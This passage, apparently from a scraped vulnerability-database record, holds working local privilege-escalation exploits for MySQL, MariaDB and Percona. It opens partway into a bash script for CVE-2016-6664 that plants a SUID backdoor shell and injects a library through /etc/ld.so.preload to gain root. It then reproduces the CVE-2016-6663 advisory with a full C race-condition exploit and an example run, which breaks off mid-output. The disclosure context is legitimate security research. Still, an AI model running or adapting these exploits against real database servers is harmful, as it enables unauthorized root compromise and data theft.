Do no harm.\r\n#\r\n\r\nBACKDOORSH=\"/bin/bash\"\r\nBACKDOORPATH=\"/tmp/mysqlrootsh\"\r\nPRIVESCLIB=\"/tmp/privesclib.so\"\r\nPRIVESCSRC=\"/tmp/privesclib.c\"\r\nSUIDBIN=\"/usr/bin/sudo\"\r\n\r\nfunction cleanexit {\r\n\t# Cleanup \r\n\techo -e \"\\n[+] Cleaning up...\"\r\n\trm -f $PRIVESCSRC\r\n\trm -f $PRIVESCLIB\r\n\trm -f $ERRORLOG\r\n\ttouch $ERRORLOG\r\n\tif [ -f /etc/ld.so.preload ]; then\r\n\t\techo -n > /etc/ld.so.preload\r\n\tfi\r\n\techo -e \"\\n[+] Job done. Exiting with code $1 \\n\"\r\n\texit $1\r\n}\r\n\r\nfunction ctrl_c() {\r\n echo -e \"\\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation.\"\r\n\tcleanexit 0\r\n}\r\n\r\n#intro \r\necho -e \"\\033[94m \\nMySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit \\nmysql-chowned.sh (ver. 1.0)\\n\\nCVE-2016-6664 / OCVE-2016-5617\\n\"\r\necho -e \"Discovered and coded by: \\n\\nDawid Golunski \\nhttp://legalhackers.com \\033[0m\"\r\n\r\n# Args\r\nif [ $# -lt 1 ]; then\r\n\techo -e \"\\n[!] Exploit usage: \\n\\n$0 path_to_error.log \\n\"\r\n\techo -e \"It seems that this server uses: `ps aux | grep mysql | awk -F'log-error=' '{ print $2 }' | cut -d' ' -f1 | grep '/'`\\n\"\r\n\texit 3\r\nfi\r\n\r\n# Priv check\r\n\r\necho -e \"\\n[+] Starting the exploit as \\n\\033[94m`id`\\033[0m\"\r\nid | grep -q mysql \r\nif [ $? -ne 0 ]; then\r\n\techo -e \"\\n[!] You need to execute the exploit as mysql user! Exiting.\\n\"\r\n\texit 3\r\nfi\r\n\r\n# Set target paths\r\nERRORLOG=\"$1\"\r\nif [ ! -f $ERRORLOG ]; then\r\n\techo -e \"\\n[!] The specified MySQL catalina.out log ($ERRORLOG) doesn't exist. 
Try again.\\n\"\r\n\texit 3\r\nfi\r\necho -e \"\\n[+] Target MySQL log file set to $ERRORLOG\"\r\n\r\n# [ Active exploitation ]\r\n\r\ntrap ctrl_c INT\r\n# Compile privesc preload library\r\necho -e \"\\n[+] Compiling the privesc shared library ($PRIVESCSRC)\"\r\ncat <<_solibeof_>$PRIVESCSRC\r\n#define _GNU_SOURCE\r\n#include <stdio.h>\r\n#include <sys/stat.h>\r\n#include <unistd.h>\r\n#include <dlfcn.h>\r\n #include <sys/types.h>\r\n #include <sys/stat.h>\r\n #include <fcntl.h>\r\n\r\nuid_t geteuid(void) {\r\n\tstatic uid_t (*old_geteuid)();\r\n\told_geteuid = dlsym(RTLD_NEXT, \"geteuid\");\r\n\tif ( old_geteuid() == 0 ) {\r\n\t\tchown(\"$BACKDOORPATH\", 0, 0);\r\n\t\tchmod(\"$BACKDOORPATH\", 04777);\r\n\t\t//unlink(\"/etc/ld.so.preload\");\r\n\t}\r\n\treturn old_geteuid();\r\n}\r\n_solibeof_\r\n/bin/bash -c \"gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl\"\r\nif [ $? -ne 0 ]; then\r\n\techo -e \"\\n[!] Failed to compile the privesc lib $PRIVESCSRC.\"\r\n\tcleanexit 2;\r\nfi\r\n\r\n\r\n# Prepare backdoor shell\r\ncp $BACKDOORSH $BACKDOORPATH\r\necho -e \"\\n[+] Backdoor/low-priv shell installed at: \\n`ls -l $BACKDOORPATH`\"\r\n\r\n# Safety check\r\nif [ -f /etc/ld.so.preload ]; then\r\n\techo -e \"\\n[!] /etc/ld.so.preload already exists. Exiting for safety.\"\r\n\texit 2\r\nfi\r\n\r\n# Symlink the log file to /etc\r\nrm -f $ERRORLOG && ln -s /etc/ld.so.preload $ERRORLOG\r\nif [ $? -ne 0 ]; then\r\n\techo -e \"\\n[!] Couldn't remove the $ERRORLOG file or create a symlink.\"\r\n\tcleanexit 3\r\nfi\r\necho -e \"\\n[+] Symlink created at: \\n`ls -l $ERRORLOG`\"\r\n\r\n# Wait for MySQL to re-open the logs\r\necho -ne \"\\n[+] Waiting for MySQL to re-open the logs/MySQL service restart...\\n\"\r\nread -p \"Do you want to kill mysqld process to instantly get root? :) ? [y/n] \" THE_ANSWER\r\nif [ \"$THE_ANSWER\" = \"y\" ]; then\r\n\techo -e \"Got it. 
Executing 'killall mysqld' now...\"\r\n\tkillall mysqld\r\nfi\r\nwhile :; do \r\n\tsleep 0.1\r\n\tif [ -f /etc/ld.so.preload ]; then\r\n\t\techo $PRIVESCLIB > /etc/ld.so.preload\r\n\t\trm -f $ERRORLOG\r\n\t\tbreak;\r\n\tfi\r\ndone\r\n\r\n# /etc/\tdir should be owned by mysql user at this point\r\n# Inject the privesc.so shared library to escalate privileges\r\necho $PRIVESCLIB > /etc/ld.so.preload\r\necho -e \"\\n[+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: \\n`ls -l /etc/ld.so.preload`\"\r\necho -e \"\\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload\"\r\necho -e \"\\n[+] The /etc/ld.so.preload file now contains: \\n`cat /etc/ld.so.preload`\"\r\nchmod 755 /etc/ld.so.preload\r\n\r\n# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)\r\necho -e \"\\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!\"\r\nsudo 2>/dev/null >/dev/null\r\n\r\n#while :; do \r\n#\tsleep 0.1\r\n#\tps aux | grep mysqld | grep -q 'log-error'\r\n#\tif [ $? -eq 0 ]; then\r\n#\t\tbreak;\r\n#\tfi\r\n#done\r\n\r\n# Check for the rootshell\r\nls -l $BACKDOORPATH\r\nls -l $BACKDOORPATH | grep rws | grep -q root\r\nif [ $? -eq 0 ]; then \r\n\techo -e \"\\n[+] Rootshell got assigned root SUID perms at: \\n`ls -l $BACKDOORPATH`\"\r\n\techo -e \"\\n\\033[94mGot root! The database server has been ch-OWNED !\\033[0m\"\r\nelse\r\n\techo -e \"\\n[!] Failed to get root\"\r\n\tcleanexit 2\r\nfi\r\n\r\n\r\n# Execute the rootshell\r\necho -e \"\\n[+] Spawning the rootshell $BACKDOORPATH now! \\n\"\r\n$BACKDOORPATH -p -c \"rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB\"\r\n$BACKDOORPATH -p\r\n\r\n# Job done.\r\ncleanexit 0\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-92513"}, {"lastseen": "2017-11-19T12:07:28", "description": "- Release date: 01.11.2016\r\n- Discovered by: Dawid Golunski\r\n\r\n\r\nI. 
VULNERABILITY\r\n-------------------------\r\n\r\nMySQL / MariaDB / PerconaDB - Privilege Escalation / Race Condition\r\n\r\n\r\nMariaDB \r\n\t< 5.5.52\r\n\t< 10.1.18\r\n < 10.0.28\r\n\r\nMySQL \r\n\t<= 5.5.51\r\n\t<= 5.6.32\r\n\t<= 5.7.14\r\n\r\nPercona Server\r\n\t< 5.5.51-38.2\r\n\t< 5.6.32-78-1\r\n\t< 5.7.14-8\r\n\r\nPercona XtraDB Cluster\r\n\t< 5.6.32-25.17\r\n\t< 5.7.14-26.17\r\n\t< 5.5.41-37.0\r\n\r\n\r\nII. BACKGROUND\r\n-------------------------\r\n\r\n\r\nMySQL:\r\n\r\n\"MySQL is the world's most popular open source database.\r\nWhether you are a fast growing web property, technology ISV or large\r\nenterprise, MySQL can cost-effectively help you deliver high performance,\r\nscalable database applications.\"\r\n\r\n\"Many of the world's largest and fastest-growing organizations including\r\nFacebook, Google, Adobe, Alcatel Lucent and Zappos rely on MySQL to save time\r\nand money powering their high-volume Web sites, business-critical systems and\r\npackaged software.\"\r\n\r\nhttp://www.mysql.com/products/\r\nhttp://www.mysql.com/why-mysql/\r\n\r\n--\r\n\r\nMariaDB:\r\n\r\n\"MariaDB is one of the most popular database servers in the world. \r\nIt\u2019s made by the original developers of MySQL and guaranteed to stay open source. \r\nNotable users include Wikipedia, WordPress.com and Google.\r\n\r\nMariaDB turns data into structured information in a wide array of applications, \r\nranging from banking to websites. It is an enhanced, drop-in replacement for MySQL. \r\nMariaDB is used because it is fast, scalable and robust, with a rich ecosystem of \r\nstorage engines, plugins and many other tools make it very versatile for a wide \r\nvariety of use cases.\"\r\n\r\nhttps://mariadb.org/about/\r\n\r\n--\r\n\r\nPerconaDB:\r\n\r\n\"Percona Server for MySQL\u00ae is a free, fully compatible, enhanced, open source \r\ndrop-in replacement for MySQL that provides superior performance, scalability \r\nand instrumentation. 
\r\nWith over 3,000,000 downloads, Percona Server\u2019s self-tuning algorithms and support\r\nfor extremely high-performance hardware delivers excellent performance and reliability.\"\r\n\r\nhttps://www.percona.com/software/mysql-database/percona-server\r\n\r\n\r\nIII. INTRODUCTION\r\n-------------------------\r\n\r\nIndependent research has revealed a race condition vulnerability that is \r\npresent in MySQL, MariaDB and PerconaDB databases. \r\n\r\nThe vulnerability can allow a local system user with access to the affected \r\ndatabase in the context of a low-privileged account (CREATE/INSERT/SELECT grants) \r\nto escalate their privileges and execute arbitrary code as the database system \r\nuser (typically 'mysql'). \r\n\r\nSuccessful exploitation would allow an attacker to gain access to all of the \r\ndatabases stored on the affected database server.\r\n\r\nThe level of access obtained upon exploitation could be chained with\r\nthe other privilege escalation vulnerabilities discovered by the author of\r\nthis advisory (CVE-2016-6662 and CVE-2016-6664) to further escalate privileges \r\nfrom the mysql user to the root user and thus allow attackers to fully compromise the \r\ntarget server.\r\n\r\n\r\nIV. DESCRIPTION\r\n-------------------------\r\n\r\n\r\nTable locations\r\n~~~~~~~~~~~~~~~~~~\r\n\r\nMySQL-based databases allow users with the CREATE table privilege to optionally\r\nspecify a disk path of the directory where the table will be stored via a DATA \r\nDIRECTORY parameter in the CREATE statement.\r\n\r\nUsers who have access to a database account with the CREATE grant could create a \r\ntable under a directory that they control. 
For example:\r\n\r\nattacker@debian:~$ mkdir /tmp/disktable\r\nattacker@debian:~$ chmod 777 /tmp/disktable/\r\nattacker@debian:~$ ls -ld /tmp/disktable/\r\ndrwxrwxrwx 2 attacker attacker 4096 Oct 28 10:53 /tmp/disktable/\r\n\r\nA user could then place a table within the directory with the following SQL \r\nstatement:\r\n\r\nmysql> CREATE TABLE poctab1 (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/disktable';\r\n\r\nwhich would result in creating the following table file:\r\n\r\nattacker@debian:~$ ls -l /tmp/disktable/\r\ntotal 0\r\n-rw-rw---- 1 mysql mysql 0 Oct 28 10:53 poctab1.MYD\r\n\r\n\r\nRace Condition\r\n~~~~~~~~~~~~~~~~~~\r\n\r\nObserving file operations performed on the table stored within the directory, \r\nit was discovered that REPAIR TABLE SQL statement which is available to \r\nlow-privileged users with SELECT/CREATE/INSERT grants, performed unsafe \r\noperations on temporary files created during the table repair process.\r\n\r\nExecuting the statement:\r\n```\r\nmysql> REPAIR TABLE `poctab1`;\r\n+----------------+--------+----------+----------+\r\n| Table | Op | Msg_type | Msg_text |\r\n+----------------+--------+----------+----------+\r\n| testdb.poctab1 | repair | status | OK |\r\n+----------------+--------+----------+----------+\r\n\r\nwould result in execution of the following system calls:\r\n\r\n[pid 1463] lstat(\"/tmp/disktable/poctab1.MYD\", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0\r\n[pid 1463] open(\"/tmp/disktable/poctab1.MYD\", O_RDWR) = 65\r\n[pid 1463] access(\"./testdb/poctab1.TRG\", F_OK) = -1 ENOENT (No such file or directory)\r\n[pid 1463] lseek(65, 0, SEEK_CUR) = 0\r\n[pid 1463] lseek(65, 0, SEEK_END) = 0\r\n[pid 1463] mprotect(0x7f6a3804f000, 12288, PROT_READ|PROT_WRITE) = 0\r\n[pid 1463] open(\"/tmp/disktable/poctab1.TMD\", O_RDWR|O_CREAT|O_EXCL|O_TRUNC, 0660) = 66\r\n[pid 1463] lseek(65, 0, SEEK_END) = 0\r\n[pid 1463] lseek(64, 0, SEEK_END) = 1024\r\n[pid 1463] close(65) = 0\r\n[pid 1463] close(66) = 0\r\n[pid 
1463] lstat(\"/tmp\", {st_mode=S_IFDIR|S_ISVTX|0777, st_size=4096, ...}) = 0\r\n[pid 1463] lstat(\"/tmp/disktable\", {st_mode=S_IFDIR|0777, st_size=4096, ...}) = 0\r\n[pid 1463] lstat(\"/tmp/disktable/poctab1.MYD\", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0\r\n[pid 1463] stat(\"/tmp/disktable/poctab1.MYD\", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0\r\n[pid 1463] chmod(\"/tmp/disktable/poctab1.TMD\", 0660) = 0\r\n[pid 1463] chown(\"/tmp/disktable/poctab1.TMD\", 110, 115) = 0\r\n[pid 1463] unlink(\"/tmp/disktable/poctab1.MYD\") = 0\r\n[pid 1463] rename(\"/tmp/disktable/poctab1.TMD\", \"/tmp/disktable/poctab1.MYD\") = 0\r\n\r\n```\r\nThe first call:\r\n```\r\n[pid 1463] lstat(\"/tmp/disktable/poctab1.MYD\", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0\r\n```\r\nwas found to check file permissions of poctab1.MYD table which are then copied with chmod()\r\nto the newly created poctab1.TMD temporary file containing the repaired table.\r\n\r\nThe code is vulnerable to Race Condition between the call:\r\n```\r\n[pid 1463] lstat(\"/tmp/disktable/poctab1.MYD\", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0\r\n```\r\nand\r\n```\r\n[pid 1463] chmod(\"/tmp/disktable/poctab1.TMD\", 0660) = 0\r\n```\r\n\r\nIf an attacker managed to unlink the temporary table poctab1.TMD and replace it\r\nwith a symlink to /var/lib/mysql before the chmod() operation (i.e. win the race), \r\nthey would be able to apply arbitrary permissions on the data directory. 
\r\nThe attacker would be able to control the set of permissions by pre-setting them on\r\nthe poctab1.MYD file before executing the REPAIR TABLE statement.\r\nFor example, by setting the permissions of poctab1.MYD to 777 the data directory\r\nwould become readable and writable to the attacker.\r\n\r\n\r\nObtaining mysql-suid shell\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\nApart from gaining access to arbitrary mysql files, the attacker could also \r\nachieve arbitrary code execution in the context of the mysql user (mysql shell).\r\n\r\nThis could be done by first pre-setting permissions on poctab1.MYD to 04777 \r\n(suid), and winning the race so that the permissions get applied on a copy\r\nof a bash shell file through the vulnerable chmod() call, effectively creating\r\na shell that elevates their permissions after execution.\r\n\r\nThere is only one problem. Their suid shell would remain owned by the \r\nattacker's user id rather than the 'mysql' user. \r\n\r\nTo elevate their privileges, the attacker would need to copy the bash shell to a \r\ntable file owned by the mysql user. 
However mysql table \r\nfiles are not writable by other users making it impossible for attacker to save \r\nthe shell.\r\n\r\nThis could be bypassed if attacker created a specially crafted directory \r\nwith a group sticky bit and then created a second table named 'poctab2' as\r\nfollows:\r\n\r\nattacker@debian:/tmp/disktable$ chmod g+s /tmp/disktable/\r\nattacker@debian:/tmp/disktable$ ls -ld /tmp/disktable/\r\ndrwxrwsrwx 2 attacker attacker 4096 Oct 28 11:25 /tmp/disktable/\r\n\r\nmysql> CREATE TABLE poctab2 (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/disktable';\r\nQuery OK, 0 rows affected (0.00 sec)\r\n\r\nattacker@debian:/tmp/disktable$ ls -l /tmp/disktable/\r\ntotal 0\r\n-rw-rw---- 1 mysql mysql 0 Oct 28 11:04 poctab1.MYD\r\n-rw-rw---- 1 mysql attacker 0 Oct 28 11:34 poctab2.MYD\r\n\r\nAs we can see poctab2.MYD table (thanks to the sticky bit (+s) on the permissions\r\nof the group on disktable directory) has 'mysql' as the owner but 'attacker' \r\nas the group. \r\nTherefore, the attacker would now be able to copy /bin/bash to poctab2.MYD file \r\nand preserve the file owner.\r\n\r\nFinally, they could exploit the Race Condition again and have SUID + exec \r\npermissions applied on poctab2.MYD which would then allow them to execute the suid \r\nshell with elevated privileges of the mysql user.\r\n\r\n\r\nFrom mysql to root\r\n~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\nAfter obtaining a mysql suid shell, attackers could then exploit one of the \r\nother MySQL vulnerabilities discovered by the author of this advisory:\r\n\r\nCVE-2016-6662 \r\nor\r\nCVE-2016-6664 (Oracle CVE-2016-5617)\r\n\r\nto escalate their privileges from mysql user to root system user.\r\n\r\n\r\n\r\n\r\nV. PROOF OF CONCEPT EXPLOIT\r\n-------------------------\r\n\r\n\r\n------------------[ mysql-privesc-race.c ]--------------------\r\n```\r\n/*\r\n\r\nMySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit\r\nmysql-privesc-race.c (ver. 
1.0)\r\n\r\nCVE-2016-6663 / OCVE-2016-5616\r\n\r\nDiscovered/Coded by:\r\n\r\nDawid Golunski\r\n\r\ndawid[at]legalhackers.com\r\n@dawid_golunski\r\nhttp://legalhackers.com\r\n\r\n\r\nCompile:\r\ngcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient\r\n\r\nNote:\r\n* On RedHat-based systems you might need to change /tmp to another public directory\r\n\r\n* For testing purposes only. Do no harm. \r\n\r\nFull advisory URL:\r\nhttp://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html\r\n\r\n*/\r\n\r\n\r\n#include <fcntl.h>\r\n#include <grp.h>\r\n#include <mysql.h>\r\n#include <pwd.h>\r\n#include <stdint.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <sys/inotify.h>\r\n#include <sys/stat.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n#include <time.h>\r\n#include <unistd.h>\r\n\r\n\r\n#define EXP_PATH \"/tmp/mysql_privesc_exploit\"\r\n#define EXP_DIRN \"mysql_privesc_exploit\"\r\n#define MYSQL_TAB_FILE EXP_PATH \"/exploit_table.MYD\"\r\n#define MYSQL_TEMP_FILE EXP_PATH \"/exploit_table.TMD\"\r\n\r\n#define SUID_SHELL \t EXP_PATH \"/mysql_suid_shell.MYD\"\r\n\r\n#define MAX_DELAY 1000 // can be used in the race to adjust the timing if necessary\r\n\r\nMYSQL *conn;\t\t // DB handles\r\nMYSQL_RES *res;\r\nMYSQL_ROW row;\r\n\r\nunsigned long cnt;\r\n\r\n\r\nvoid intro() {\r\n\r\nprintf( \r\n \"\\033[94m\\n\"\r\n \"MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit\\n\"\r\n \"mysql-privesc-race.c (ver. 1.0)\\n\\n\"\r\n \"CVE-2016-6663 / OCVE-2016-5616\\n\\n\"\r\n \"For testing purposes only. 
Do no harm.\\n\\n\"\r\n\t\"Discovered/Coded by:\\n\\n\"\r\n\t\"Dawid Golunski \\n\"\r\n\t\"http://legalhackers.com\"\r\n \"\\033[0m\\n\\n\");\r\n\r\n}\r\n\r\nvoid usage(char *argv0) {\r\n intro();\r\n printf(\"Usage:\\n\\n%s user pass db_host database\\n\\n\", argv0);\r\n}\r\n\r\nvoid mysql_cmd(char *sql_cmd, int silent) {\r\n \r\n if (!silent) {\r\n\t printf(\"%s \\n\", sql_cmd);\r\n }\r\n if (mysql_query(conn, sql_cmd)) {\r\n fprintf(stderr, \"%s\\n\", mysql_error(conn));\r\n exit(1);\r\n }\r\n res = mysql_store_result(conn);\r\n if (res>0) mysql_free_result(res);\r\n\r\n}\r\n\r\n\r\nint main(int argc,char **argv)\r\n{\r\n\r\n int randomnum = 0;\r\n int io_notified = 0;\r\n int myd_handle;\r\n int wpid;\r\n int is_shell_suid=0;\r\n pid_t pid;\r\n int status;\r\n struct stat st;\r\n /* io notify */\r\n int fd;\r\n int ret;\r\n char buf[4096] __attribute__((aligned(8)));\r\n int num_read;\r\n struct inotify_event *event;\r\n /* credentials */\r\n char *user = argv[1];\r\n char *password = argv[2];\r\n char *db_host = argv[3];\r\n char *database = argv[4];\r\n\r\n\r\n // Disable buffering of stdout\r\n setvbuf(stdout, NULL, _IONBF, 0);\r\n\r\n // Get the params\r\n if (argc!=5) {\r\n\tusage(argv[0]);\r\n\texit(1);\r\n } \r\n intro();\r\n // Show initial privileges\r\n printf(\"\\n[+] Starting the exploit as: \\n\");\r\n system(\"id\");\r\n\r\n // Connect to the database server with provided credentials\r\n printf(\"\\n[+] Connecting to the database `%s` as %s@%s\\n\", database, user, db_host);\r\n conn = mysql_init(NULL);\r\n if (!mysql_real_connect(conn, db_host, user, password, database, 0, NULL, 0)) {\r\n fprintf(stderr, \"%s\\n\", mysql_error(conn));\r\n exit(1);\r\n }\r\n\r\n // Prepare tmp dir\r\n printf(\"\\n[+] Creating exploit temp directory %s\\n\", \"/tmp/\" EXP_DIRN);\r\n umask(000);\r\n system(\"rm -rf /tmp/\" EXP_DIRN \" && mkdir /tmp/\" EXP_DIRN);\r\n system(\"chmod g+s /tmp/\" EXP_DIRN );\r\n\r\n // Prepare exploit tables :)\r\n printf(\"\\n[+] 
Creating mysql tables \\n\\n\");\r\n mysql_cmd(\"DROP TABLE IF EXISTS exploit_table\", 0);\r\n mysql_cmd(\"DROP TABLE IF EXISTS mysql_suid_shell\", 0);\r\n mysql_cmd(\"CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '\" EXP_PATH \"'\", 0);\r\n mysql_cmd(\"CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '\" EXP_PATH \"'\", 0);\r\n\r\n // Copy /bin/bash into the mysql_suid_shell.MYD mysql table file\r\n // The file should be owned by mysql:attacker thanks to the sticky bit on the table directory\r\n printf(\"\\n[+] Copying bash into the mysql_suid_shell table.\\n After the exploitation the following file/table will be assigned SUID and executable bits : \\n\");\r\n system(\"cp /bin/bash \" SUID_SHELL);\r\n system(\"ls -l \" SUID_SHELL);\r\n\r\n // Use inotify to get the timing right\r\n fd = inotify_init();\r\n if (fd < 0) {\r\n printf(\"failed to inotify_init\\n\");\r\n return -1;\r\n }\r\n ret = inotify_add_watch(fd, EXP_PATH, IN_CREATE | IN_CLOSE);\r\n\r\n\r\n /* Race loop until the mysql_suid_shell.MYD table file gets assigned SUID+exec perms */\r\n\r\n printf(\"\\n[+] Entering the race loop... 
Hang in there...\\n\");\r\n\r\n while ( is_shell_suid != 1 ) {\r\n\r\n cnt++;\r\n\tif ( (cnt % 100) == 0 ) {\r\n\t \tprintf(\"->\");\r\n\t \t//fflush(stdout);\t\r\n\t}\r\n\r\n /* Create empty file , remove if already exists */\r\n unlink(MYSQL_TEMP_FILE);\r\n unlink(MYSQL_TAB_FILE);\r\n \tmysql_cmd(\"DROP TABLE IF EXISTS exploit_table\", 1);\r\n\tmysql_cmd(\"CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '\" EXP_PATH \"'\", 1);\r\n\r\n\t/* random num if needed */\r\n srand ( time(NULL) );\r\n randomnum = ( rand() % MAX_DELAY );\r\n\r\n // Fork, to run the query asynchronously and have time to replace table file (MYD) with a symlink\r\n pid = fork();\r\n if (pid < 0) {\r\n fprintf(stderr, \"Fork failed :(\\n\");\r\n }\r\n\r\n /* Child process - executes REPAIR TABLE SQL statement */\r\n if (pid == 0) {\r\n usleep(500);\r\n unlink(MYSQL_TEMP_FILE);\r\n\t mysql_cmd(\"REPAIR TABLE exploit_table EXTENDED\", 1);\r\n // child stops here\r\n exit(0);\r\n }\r\n\r\n /* Parent process - aims to replace the temp .tmd table with a symlink before chmod */\r\n if (pid > 0 ) {\r\n io_notified = 0;\r\n\r\n while (1) {\r\n int processed = 0;\r\n ret = read(fd, buf, sizeof(buf));\r\n if (ret < 0) {\r\n break;\r\n }\r\n while (processed < ret) {\r\n event = (struct inotify_event *)(buf + processed);\r\n if (event->mask & IN_CLOSE) {\r\n if (!strcmp(event->name, \"exploit_table.TMD\")) {\r\n //usleep(randomnum);\r\n\r\n\t\t\t // Set the .MYD permissions to suid+exec before they get copied to the .TMD file \r\n\t\t\t unlink(MYSQL_TAB_FILE);\r\n\t\t\t myd_handle = open(MYSQL_TAB_FILE, O_CREAT, 0777);\r\n\t\t\t close(myd_handle);\r\n\t\t\t chmod(MYSQL_TAB_FILE, 04777);\r\n\r\n\t\t\t // Replace the temp .TMD file with a symlink to the target sh binary to get suid+exec\r\n unlink(MYSQL_TEMP_FILE);\r\n symlink(SUID_SHELL, MYSQL_TEMP_FILE);\r\n io_notified=1;\r\n }\r\n }\r\n processed += sizeof(struct inotify_event);\r\n }\r\n if (io_notified) {\r\n break;\r\n 
}\r\n }\r\n\r\n\r\n waitpid(pid, &status, 0);\r\n }\r\n\r\n\t// Check if SUID bit was set at the end of this attempt\r\n if ( lstat(SUID_SHELL, &st) == 0 ) {\r\n\t if (st.st_mode & S_ISUID) {\r\n\t\tis_shell_suid = 1;\r\n\t }\r\n } \r\n\r\n }\r\n\r\n printf(\"\\n\\n[+] \\033[94mBingo! Race won (took %lu tries) !\\033[0m Check out the \\033[94mmysql SUID shell\\033[0m: \\n\\n\", cnt);\r\n system(\"ls -l \" SUID_SHELL);\r\n\r\n printf(\"\\n[+] Spawning the \\033[94mmysql SUID shell\\033[0m now... \\n Remember that from there you can gain \\033[1;31mroot\\033[0m with vuln \\033[1;31mCVE-2016-6662\\033[0m or \\033[1;31mCVE-2016-6664\\033[0m :)\\n\\n\");\r\n system(SUID_SHELL \" -p -i \");\r\n //system(SUID_SHELL \" -p -c '/bin/bash -i -p'\");\r\n\r\n /* close MySQL connection and exit */\r\n printf(\"\\n[+] Job done. Exiting\\n\\n\");\r\n mysql_close(conn);\r\n return 0;\r\n\r\n}\r\n\r\n```\r\n\r\n\r\n\r\n\r\nExample run:\r\n~~~~~~~~~~~~~~\r\n```\r\nattacker@xenial:~/mysql-exploit$ lsb_release -a\r\nNo LSB modules are available.\r\nDistributor ID:\tUbuntu\r\nDescription:\tUbuntu 16.04.1 LTS\r\nRelease:\t16.04\r\nCodename:\txenial\r\n\r\nattacker@xenial:~/mysql-exploit$ dpkg -l | grep -i mariadb-serv\r\nii mariadb-server 10.0.27-0ubuntu0.16.04.1 all MariaDB database server (metapackage depending on the latest version)\r\nii mariadb-server-10.0 10.0.27-0ubuntu0.16.04.1 amd64 MariaDB database server binaries\r\nii mariadb-server-core-10.0 10.0.27-0ubuntu0.16.04.1 amd64 MariaDB database core server files\r\n\r\nattacker@xenial:~/mysql-exploit$ id\r\nuid=1001(attacker) gid=1001(attacker) groups=1001(attacker)\r\n\r\nattacker@xenial:~/mysql-exploit$ mysql -uattacker -ppocsql -hlocalhost pocdb -e 'show grants;'\r\n+-----------------------------------------------------------------------------------------------------------------+\r\n| Grants for attacker@localhost 
|\r\n+-----------------------------------------------------------------------------------------------------------------+\r\n| GRANT USAGE ON *.* TO 'attacker'@'localhost' IDENTIFIED BY PASSWORD '*3CC3900C7B2B0A885AB128894FC10949340A09CC' |\r\n| GRANT SELECT, INSERT, CREATE, DROP ON `pocdb`.* TO 'attacker'@'localhost' |\r\n+-----------------------------------------------------------------------------------------------------------------+\r\n\r\nattacker@xenial:~/mysql-exploit$ ls -l /var/lib/mysql/mysql/user.*\r\nls: cannot access '/var/lib/mysql/mysql/user.*': Permission denied\r\n\r\nattacker@xenial:~/mysql-exploit$ time ./mysql-privesc-race attacker pocsql localhost pocdb\r\n\r\nMySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit\r\nmysql-privesc-race.c (ver. 1.0)\r\n\r\nCVE-2016-6663 / OCVE-2016-5616\r\n\r\nFor testing purposes only. Do no harm.\r\n\r\nDiscovered/Coded by:\r\n\r\nDawid Golunski \r\nhttp://legalhackers.com\r\n\r\n\r\n[+] Starting the exploit as: \r\nuid=1001(attacker) gid=1001(attacker) groups=1001(attacker)\r\n\r\n[+] Connecting to the database `pocdb` as attacker@localhost\r\n\r\n[+] Creating exploit temp directory /tmp/mysql_privesc_exploit\r\n\r\n[+] Creating mysql tables \r\n\r\nDROP TABLE IF EXISTS exploit_table \r\nDROP TABLE IF EXISTS mysql_suid_shell \r\nCREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' \r\nCREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' \r\n\r\n[+] Copying bash into the mysql_suid_shell table. After the exploitation the following file/table will be assigned SUID and executable bits : \r\n-rw-rw---- 1 mysql attacker 1037528 Nov 1 02:33 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD\r\n\r\n[+] Entering the race loop... Hang in there...\r\n\r\n\r\n[+] Bingo! Race won (took 5 tries) ! 
